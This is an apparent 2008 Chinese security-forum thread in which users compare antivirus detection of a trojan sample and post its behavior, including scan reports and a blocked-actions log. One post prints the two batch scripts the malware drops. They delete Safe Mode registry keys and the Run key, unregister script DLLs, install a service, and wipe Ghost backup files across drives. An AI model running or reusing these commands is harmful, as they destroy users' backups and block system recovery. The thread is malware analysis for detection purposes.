很厉害

显示全部楼层 · 发表于 2008-3-30 18:36:02

avast，nod32，卡巴无反应，微点报，但是不能拦截，大家看看，

[ 本帖最后由 tp123_0 于 2008-3-30 18:39 编辑 ]

显示全部楼层 · 发表于 2008-3-30 18:37:49

哥们
你深度来的把

显示全部楼层 · 发表于 2008-3-30 18:38:03

Starting the file scan:

Begin scan in 'D:\oky.rar'
D:\oky.rar
  [0] Archive type: RAR
  --> oky.exe
   [DETECTION] Is the Trojan horse TR/Agent.AHOW
   [INFO]    The file was deleted!

显示全部楼层 · 发表于 2008-3-30 18:42:47

样本我本来想发呢，结果被这位仁兄发了,,
确实有很多不能杀，深度那个人说用微点能拦截住，清理不干净，开机微点说还是有，杀不掉，高手们用微点的试试

[ 本帖最后由快乐男孩6 于 2008-3-30 18:48 编辑 ]

显示全部楼层 · 发表于 2008-3-30 18:47:31

FP挂，等会打包上报

显示全部楼层 · 发表于 2008-3-30 18:49:55

这么厉害吗？给avast上报下

显示全部楼层 · 发表于 2008-3-30 19:01:16

费尔不认识

显示全部楼层 · 发表于 2008-3-30 19:01:40

这是病毒释放的第一个批处理。

3177
17650
18911
15019
2042
9641
date 2004-08-17
19896
time 20:00:00
ping 127.0.0.1 -n 5
sc.exe create ras32tdriver BinPath= "C:\WINDOWS\system32\ras32tdriver.exe -kills" type= own type= interact start= auto DisplayName= ras32tdriver problemadvertizing
sc.exe description ras32tdriver 创建网络连接2
regsvr32.exe /u /s scrrun.dll
regsvr32.exe /u /s shimgvw.dll
regsvr32.exe /u /s itss.dll
regsvr32.exe /u /s vbscript.dll
regsvr32.exe /s jscript.dll
reg.exe delete HKLM\SYSTEM\ControlSet001\Control\SafeBoot\Minimal\{4D36E967-E325-11CE-BFC1-08002BE10318} /F
reg.exe delete HKLM\SYSTEM\ControlSet001\Control\SafeBoot\Network\{4D36E967-E325-11CE-BFC1-08002BE10318} /F
reg.exe delete HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\{4D36E967-E325-11CE-BFC1-08002BE10318} /F
reg.exe delete HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\{4D36E967-E325-11CE-BFC1-08002BE10318} /F
reg.exe delete HKLM\Software\Microsoft\Windows\CurrentVersion\Run /F
28372
sc.exe start ras32tdriver
del "C:\WINDOWS\Media\Windows XP 开始.wav"
del "C:\WINDOWS\Media\Windows XP 信息栏.wav"
del "C:\WINDOWS\Media\Windows XP 弹出窗口已阻止.wav"
regsvr32.exe /s C:\WINDOWS\system32\Guaranteecashfie.dll
ping 127.0.0.1 -n 6
del "C:\Documents and Settings\Administrator\桌面\oky\oky.exe" /F
7022
321
date 2008-03-30
time 18:58:35

del %0
exit
----------------------------------------------------------------------------------
释放的第二个批处理。

9742
17114
30401109694892
1251426453
6745
ping 127.0.0.1 -n 16
11553
cmd.exe /c del /f /s /q c:*.gho
9345
cmd.exe /c del /f /s /q d:*.gho
21931
cmd.exe /c del /f /s /q e:*.gho
18684
cmd.exe /c del /f /s /q f:*.gho
13455
cmd.exe /c del /f /s /q g:*.gho
21361
cmd.exe /c del /f /s /q h:*.gho
31592
cmd.exe /c del /f /s /q i:*.gho
14685

regsvr32.exe /s C:\WINDOWS\system32\policeproblem.dll
del %0
exit

---------------------------------------------------------------------------------------

[ 本帖最后由 rest1min 于 2008-3-30 19:13 编辑 ]

显示全部楼层 · 发表于 2008-3-30 19:04:41

2008-03-30 19:00:41 修改注册表内容    操作:阻止
进程路径:D:\样本\oky\oky.exe
注册表路径:HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\RNG
注册表名称:Seed
触发规则:应用程序规则->自动创建规则->D:\样本\*

2008-03-30 19:00:41 修改注册表内容    操作:阻止
进程路径:D:\样本\oky\oky.exe
注册表路径:HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders
注册表名称:AppData
注册表数据:C:\Documents and Settings\Administrator\Application Data
触发规则:应用程序规则->自动创建规则->D:\样本\*

2008-03-30 19:00:41 创建文件    操作:阻止
进程路径:D:\样本\oky\oky.exe
文件路径:C:\75429677.bat
触发规则:黑名单->自建->C:\*

2008-03-30 19:00:42 创建文件    操作:阻止
进程路径:D:\样本\oky\oky.exe
文件路径:C:\25143225.bat
触发规则:黑名单->自建->C:\*

2008-03-30 19:00:44 创建文件    操作:阻止
进程路径:D:\样本\oky\oky.exe
文件路径:C:\ras32tdriver.txt
触发规则:黑名单->自建->C:\*

2008-03-30 19:00:44 创建文件    操作:阻止
进程路径:D:\样本\oky\oky.exe
文件路径:C:\WINDOWS\system32\Guaranteecashfie.dll
触发规则:应用程序规则->自动创建规则->D:\样本\*

2008-03-30 19:00:44 创建文件    操作:阻止
进程路径:D:\样本\oky\oky.exe
文件路径:C:\ras32tdriver.txt
触发规则:黑名单->自建->C:\*

2008-03-30 19:00:44 创建文件    操作:阻止
进程路径:D:\样本\oky\oky.exe
文件路径:C:\WINDOWS\system32\ras32tdriver.exe
触发规则:应用程序规则->自动创建规则->D:\样本\*

2008-03-30 19:00:44 创建文件    操作:阻止
进程路径:D:\样本\oky\oky.exe
文件路径:C:\MSBO0T.TXT
触发规则:黑名单->自建->C:\*

2008-03-30 19:00:44 修改注册表内容    操作:阻止
进程路径:D:\样本\oky\oky.exe
注册表路径:HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders
注册表名称:Startup
注册表数据:C:\Documents and Settings\Administrator\「开始」菜单\程序\启动
触发规则:应用程序规则->自动创建规则->D:\样本\*

2008-03-30 19:00:44 修改注册表内容    操作:阻止
进程路径:D:\样本\oky\oky.exe
注册表路径:HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\RNG
注册表名称:Seed
触发规则:应用程序规则->自动创建规则->D:\样本\*

2008-03-30 19:00:44 修改注册表内容    操作:阻止
进程路径:D:\样本\oky\oky.exe
注册表路径:HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\RNG
注册表名称:Seed
触发规则:应用程序规则->自动创建规则->D:\样本\*

2008-03-30 19:00:44 修改注册表内容    操作:阻止
进程路径:D:\样本\oky\oky.exe
注册表路径:HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\RNG
注册表名称:Seed
触发规则:应用程序规则->自动创建规则->D:\样本\*

2008-03-30 19:00:45 修改注册表内容    操作:阻止
进程路径:D:\样本\oky\oky.exe
注册表路径:HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\RNG
注册表名称:Seed
触发规则:应用程序规则->自动创建规则->D:\样本\*

2008-03-30 19:00:45 修改注册表内容    操作:阻止
进程路径:D:\样本\oky\oky.exe
注册表路径:HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\RNG
注册表名称:Seed
触发规则:应用程序规则->自动创建规则->D:\样本\*

2008-03-30 19:00:45 修改注册表内容    操作:阻止
进程路径:D:\样本\oky\oky.exe
注册表路径:HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\RNG
注册表名称:Seed
触发规则:应用程序规则->自动创建规则->D:\样本\*

2008-03-30 19:00:45 修改注册表内容    操作:阻止
进程路径:D:\样本\oky\oky.exe
注册表路径:HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\RNG
注册表名称:Seed
触发规则:应用程序规则->自动创建规则->D:\样本\*

2008-03-30 19:00:48 安装服务或者驱动    操作:阻止
进程路径:C:\WINDOWS\system32\services.exe
文件路径:C:\WINDOWS\system32\ras32tdriver.exe -kf
触发规则:所有程序规则->*

2008-03-30 19:00:48 修改注册表内容    操作:阻止
进程路径:D:\样本\oky\oky.exe
注册表路径:HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\ras32tdriver
注册表名称:Start
触发规则:应用程序规则->自动创建规则->D:\样本\*

2008-03-30 19:00:48 创建注册表值    操作:阻止
进程路径:D:\样本\oky\oky.exe
注册表路径:HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main
注册表名称:Play_Background_Sounds
注册表数据:no
触发规则:应用程序规则->自动创建规则->D:\样本\*

2008-03-30 19:00:48 创建注册表值    操作:阻止
进程路径:D:\样本\oky\oky.exe
注册表路径:HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main
注册表名称:Play_Animations
注册表数据:no
触发规则:应用程序规则->自动创建规则->D:\样本\*

2008-03-30 19:00:48 创建注册表值    操作:阻止
进程路径:D:\样本\oky\oky.exe
注册表路径:HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main
注册表名称:Display Inline Videos
注册表数据:no
触发规则:应用程序规则->自动创建规则->D:\样本\*

2008-03-30 19:00:48 创建注册表值    操作:阻止
进程路径:D:\样本\oky\oky.exe
注册表路径:HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main
注册表名称:Enable AutoImageResize
注册表数据:no
触发规则:应用程序规则->自动创建规则->D:\样本\*

2008-03-30 19:00:48 修改注册表内容    操作:阻止
进程路径:D:\样本\oky\oky.exe
注册表路径:HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main
注册表名称:Display Inline Images
注册表数据:yes
触发规则:应用程序规则->自动创建规则->D:\样本\*

2008-03-30 19:00:48 修改注册表内容    操作:阻止
进程路径:D:\样本\oky\oky.exe
注册表路径:HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main
注册表名称:Disable Script Debugger
注册表数据:yes
触发规则:应用程序规则->自动创建规则->D:\样本\*

2008-03-30 19:00:48 修改注册表内容    操作:阻止
进程路径:D:\样本\oky\oky.exe
注册表路径:HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main
注册表名称:DisableScriptDebuggerIE
注册表数据:yes
触发规则:应用程序规则->自动创建规则->D:\样本\*

2008-03-30 19:00:48 修改注册表内容    操作:阻止
进程路径:D:\样本\oky\oky.exe
注册表路径:HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\ActiveX Compatibility\{D27CDB6E-AE6D-11CF-96B8-444553540000}
注册表名称:Compatibility Flags
注册表数据:00000400
触发规则:应用程序规则->自动创建规则->D:\样本\*

2008-03-30 19:00:48 修改注册表内容    操作:阻止
进程路径:D:\样本\oky\oky.exe
注册表路径:HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders
注册表名称:Personal
注册表数据:D:\我的文档
触发规则:应用程序规则->自动创建规则->D:\样本\*

2008-03-30 19:00:48 修改注册表内容    操作:阻止
进程路径:D:\样本\oky\oky.exe
注册表路径:HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{455aec50-f342-11dc-ad44-806d6172696f}
注册表名称:BaseClass
注册表数据:Drive
触发规则:应用程序规则->自动创建规则->D:\样本\*

2008-03-30 19:00:48 修改注册表内容    操作:阻止
进程路径:D:\样本\oky\oky.exe
注册表路径:HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{455aec53-f342-11dc-ad44-806d6172696f}
注册表名称:BaseClass
注册表数据:Drive
触发规则:应用程序规则->自动创建规则->D:\样本\*

2008-03-30 19:00:48 修改注册表内容    操作:阻止
进程路径:D:\样本\oky\oky.exe
注册表路径:HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{455aec52-f342-11dc-ad44-806d6172696f}
注册表名称:BaseClass
注册表数据:Drive
触发规则:应用程序规则->自动创建规则->D:\样本\*

2008-03-30 19:00:48 修改注册表内容    操作:阻止
进程路径:D:\样本\oky\oky.exe
注册表路径:HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{455aec51-f342-11dc-ad44-806d6172696f}
注册表名称:BaseClass
注册表数据:Drive
触发规则:应用程序规则->自动创建规则->D:\样本\*

2008-03-30 19:00:48 修改注册表内容    操作:阻止
进程路径:D:\样本\oky\oky.exe
注册表路径:HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{455aec58-f342-11dc-ad44-fcfe9b823319}
注册表名称:BaseClass
注册表数据:Drive
触发规则:应用程序规则->自动创建规则->D:\样本\*

2008-03-30 19:00:48 修改注册表内容    操作:阻止
进程路径:D:\样本\oky\oky.exe
注册表路径:HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{455aec54-f342-11dc-ad44-806d6172696f}
注册表名称:BaseClass
注册表数据:Drive
触发规则:应用程序规则->自动创建规则->D:\样本\*

2008-03-30 19:00:48 修改注册表内容    操作:阻止
进程路径:D:\样本\oky\oky.exe
注册表路径:HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{455aec55-f342-11dc-ad44-806d6172696f}
注册表名称:BaseClass
注册表数据:Drive
触发规则:应用程序规则->自动创建规则->D:\样本\*

2008-03-30 19:00:48 修改注册表内容    操作:阻止
进程路径:D:\样本\oky\oky.exe
注册表路径:HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders
注册表名称:Common Documents
注册表数据:C:\Documents and Settings\All Users\Documents
触发规则:应用程序规则->自动创建规则->D:\样本\*

2008-03-30 19:00:48 修改注册表内容    操作:阻止
进程路径:D:\样本\oky\oky.exe
注册表路径:HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders
注册表名称:Desktop
注册表数据:C:\Documents and Settings\Administrator\桌面
触发规则:应用程序规则->自动创建规则->D:\样本\*

2008-03-30 19:00:48 修改注册表内容    操作:阻止
进程路径:D:\样本\oky\oky.exe
注册表路径:HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders
注册表名称:Common Desktop
注册表数据:C:\Documents and Settings\All Users\桌面
触发规则:应用程序规则->自动创建规则->D:\样本\*

2008-03-30 19:00:48 修改注册表内容    操作:阻止
进程路径:D:\样本\oky\oky.exe
注册表路径:HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
注册表名称:ProxyBypass
触发规则:应用程序规则->自动创建规则->D:\样本\*

2008-03-30 19:00:48 修改注册表内容    操作:阻止
进程路径:D:\样本\oky\oky.exe
注册表路径:HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
注册表名称:IntranetName
注册表数据:酾
触发规则:应用程序规则->自动创建规则->D:\样本\*

2008-03-30 19:00:48 修改注册表内容    操作:阻止
进程路径:D:\样本\oky\oky.exe
注册表路径:HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
注册表名称:UNCAsIntranet
触发规则:应用程序规则->自动创建规则->D:\样本\*

2008-03-30 19:00:49 修改注册表内容    操作:阻止
进程路径:D:\样本\oky\oky.exe
注册表路径:HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
注册表名称:ProxyBypass
注册表数据:?
触发规则:应用程序规则->自动创建规则->D:\样本\*

2008-03-30 19:00:49 修改注册表内容    操作:阻止
进程路径:D:\样本\oky\oky.exe
注册表路径:HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
注册表名称:IntranetName
触发规则:应用程序规则->自动创建规则->D:\样本\*

2008-03-30 19:00:49 修改注册表内容    操作:阻止
进程路径:D:\样本\oky\oky.exe
注册表路径:HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
注册表名称:UNCAsIntranet
触发规则:应用程序规则->自动创建规则->D:\样本\*

2008-03-30 19:00:49 修改注册表内容    操作:阻止
进程路径:D:\样本\oky\oky.exe
注册表路径:HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders
注册表名称:Cache
注册表数据:C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files
触发规则:应用程序规则->自动创建规则->D:\样本\*

2008-03-30 19:00:49 修改注册表内容    操作:阻止
进程路径:D:\样本\oky\oky.exe
注册表路径:HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders
注册表名称:Cookies
注册表数据:C:\Documents and Settings\Administrator\Cookies
触发规则:应用程序规则->自动创建规则->D:\样本\*

2008-03-30 19:00:49 创建注册表值    操作:阻止
进程路径:D:\样本\oky\oky.exe
注册表路径:HKEY_CURRENT_USER\Software\Microsoft\Windows\ShellNoRoam\MUICache
注册表名称:C:\WINDOWS\system32\cmd.exe
注册表数据:Windows Command Processor
触发规则:应用程序规则->自动创建规则->D:\样本\*

显示全部楼层 · 发表于 2008-3-30 19:53:09

oky.rar
[0] Archive type: RAR
--> oky.exe
      [DETECTION] Is the Trojan horse TR/Agent.AHOW
      [WARNING] Infected files in archives cannot be repaired!
      [INFO]    The file was moved to '48687f76.qua'!

[可疑文件] 很厉害

本帖子中包含更多资源

本帖子中包含更多资源